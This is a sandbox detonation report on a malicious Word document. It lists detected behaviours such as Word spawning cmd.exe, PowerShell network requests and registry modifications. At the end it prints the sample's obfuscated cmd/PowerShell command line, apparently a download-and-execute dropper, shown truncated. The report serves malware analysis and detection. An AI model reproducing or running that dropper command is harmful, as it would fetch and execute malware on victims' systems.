Analysis Overview
SHA256
6d065101c82387e4d45dc8df1cd0f0c2ac088407908d4fed319a7ea10e9e17cc
Threat Level: Known bad
The file 78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Suspicious Office macro
Office macro that triggers on suspicious action
Command and Scripting Interpreter: PowerShell
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: AddClipboardFormatListener
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 09:08
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 09:08
Reported
2024-05-27 09:11
Platform
win7-20240221-en
Max time kernel
117s
Max time network
123s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\78a1829c397cf9eca27335cd43eeb5fe_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\SysWOW64\cmd.exe
cmd /c cmD.Exe /V:O /R " set ~'{=-_\--/_-///\\__ /__\\_\-_/-/-\/ _/_-/_-/-_\-/\\ \\--//_-\__/\-_ _\\_////\--_\-- \_/-__-\/_-\\/- \-\\_-/__///\-- /_\/-/-\_-\-/__ \-//_//_--\\_\_ _-\\-_-\///_/-_ _\-/-/_\/-\_/-_ \__\--////\\-__ -/\__/\/-\\-__/ -__/\\-/-_\\/-_ /---\\/\\/-___/ //_\-\/_--/_\_\ //_--\_\_-\/-_\ /\__\--/_/-\\-/}\\__//_//-\---\}-/\\\\/__--//_-{-_-\_//\--\/\_/h/\/-\_-/-/__\-_c_-_/__-/\/\\-\/t_-/\\/_-_-\/\/-a-/--_//\-\\\_/_c_\-/_\_/\--\//_}/-\_\\//_-\-__/;\//---\_/_/\_-_k-_-//\__/\\_/\-a\--_-\\/__/_-/\e/-__\\_--/\\/-_r/\---_\\//\___-b\__/\_/\/----\/;-\_///_-\-\_-_\i-_\/_--\\/\_/-_s__/\\_-/\/_-\/-w/\\-_-_/_--\/\/$_\--__/\/-/_\\- /\-_//\-\\/-__-s-/\_-/-\_\_/-\_s\\_/-__\_//-/-\e\/\-_-_\\///__-c\_\-_-\\_//-//_o/\/-/\/-_\_\--_r_/_-\/__\--\//-P\\_-\\-/-_/-_/_-\\--//\___/_/--t_-___\---/\///\r_//\_-\-/__/-\-a/_/\_\/-\-/-\-_t\/\//_--__\-/\-S_/_\/--\/\_--_\;\-__\_/\_/\/--/)/\--\-_//_\-__\i--\_/-\\/__/-/\s/\/-\\--\__//__w-_\-\-_/__/-\/\$/-/__\-\_\//-_- \__\_-_--//-\\/,__-_\_//-\//\-\z\\--\/-_/_-/__/W/-\//-\_/\\-___A_\__\//--/--/_\$///_\-__\\-\/-_(/_-_\_-\/\-\_-/e_/-\-\_-//\_-\_l\//\/_-_--\_/-_i/-__\\__-\\/--/F\---//__\\//-\_d\_/__\---/\-\//a/_-\\/_\/--\__-o-/-_/\-_/\\/-_\l\//-\_\_-/-\-/_n-__-\/\/-\/_/\-w_-/\/\-__\\-/-_o/-_-__/-\_\-/\/D-_-_/\\-/_/_/\-.\_\//-/--_\-/__j-//-_\_-/\/\\-_L--/\__\/-\_\_/-h\/-_/_--/__-/\\$_-_\/-\/\-_/_/\{/\-\\\//_-_/_--y_\__//\/_-\---\r/----/____\\\/\t\--//\/_/__-_\-{\\-/_-\\_/-/_-_)-/__-///\_-\\-_O\_/\--/-_-_/\_/V--__\\--\//_/_/h_/---\/_\-/\_\/$/_\/\//-__--\_- _\/_\--_\_/--/\n/\\-\-_-_/-\_//i\__\---/\//_\-_ \\\/\__-/_/--_/z\\_/-/-/\-_\/-_W_\_/\-_/-_-/\-\A\-///_/\__--\\_$-_-//_--\/\/\_\(_-/\\_--//-/\\_h/\__\//-_\--\/_c\_/_--_-_-\/\\/a_\/_//\-_/\_---e-\_/-_-_\\_\///r\/--_\/__\\//_-o-/_\\_-_//-_/\\f/_\-\\/-_\--//_;/_-_\__-\-/\/\/'-/\\-\__//-/_-\e\_\-/--//\-__/\x//\_/_--/-\_\-_e/\\//-_--_\-\_/.\_\//_--/-\\/__'_\/-_-_-///\\\_+/_\-\/_/-_-\\/-F-/\_-__\\/\--//J\\/__\-/\/_-/_-c//\\_-/-_-_-\/\$-/-\/\_-/__-\/_+/-\_\_-_/_/\/--'/-_-\\/\-\__/_-\\_--\\_-//\//_-'//\-_--/\-/\\__+-\_-\__\/_\//-/p/\/__\//\_-\--_m\\-_-/-\/__/-_\e-/__\\/-_-\/_-\t/-_-/-_/\\_/\-_://_\\\_---/\-_/v_\/\-\-/_/_\_--n\/-_\-_-//_/-\\e_/-\//\_-\--_/_$__-//\--_\_\/-\=/\-_\\-/_-/_/_-i/-\/_\-_-_\/-_\s--/_/-__-/\_\\/w__-/--\\-_//\/\$/\_/--/_/\__-\-;_/--/-_/-\\__/\'_-\//\_\-_-/-_/4-/-_-/_\\-\\/__7_--_/\_/-/-\\\/9\_/\_/----\__//'-/-/\/_\--__\/_ _/\/\-\_/-/-__\=_\_\_--\/--_//\ 